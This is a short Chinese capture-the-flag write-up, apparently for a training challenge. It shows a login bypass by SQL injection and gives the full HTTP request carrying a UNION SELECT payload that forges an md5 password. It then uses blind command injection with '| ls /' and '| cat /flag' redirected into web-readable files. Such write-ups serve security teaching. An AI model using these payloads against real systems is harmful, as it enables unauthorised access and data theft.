这里提示是命令执行
抓包发现有五个报文
其中login.php中有base64加密语句
$sql="SELECT username,password FROM admin WHERE username='".$username."'";
if (!empty($row) && $row['password']===md5($password)){
}
这里得到SQL语句的组成,开始绕过密码判断
POST /login.php HTTP/1.1
Host: 114.67.175.224:14715
Content-Length: 52
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://114.67.175.224:14715
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 Edg/123.0.0.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://114.67.175.224:14715/login.php?password=1
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Cookie: Hm_lvt_c1b044f909411ac4213045f0478e96fc=1711286763; _ga=GA1.1.52075818.1711286767; _ga_F3VRZT58SJ=GS1.1.1711288951.2.1.1711290145.0.0.0; PHPSESSID=ohlo1q3nbms2srg6aav8cgase6
Connection: close
username=admin'UNION SELECT 1,md5(123)#&password=123
这里账号为admin,然后使用联合查询使得返回的两个空格,1空格代表账号,二空格代表密码,这里我们直接将二空格的密码填充为123的md5值,row\['password'\]得到的就是这个123的md5值,而我们用password传递的123就会变成password,这时row\['password'\]===md5(password)为真,成功绕过密码
来到服务查询页面
试了试ssh等服务查询
开始命令执行绕过
命令执行没有回显
利用sleep看看是否执行了
这里确实是执行了,但是没有回显
将结果写成可访问文件
| ls / > a.html
访问得到命令执行回显
看到flag文件
| cat /flag > b.html
得到flag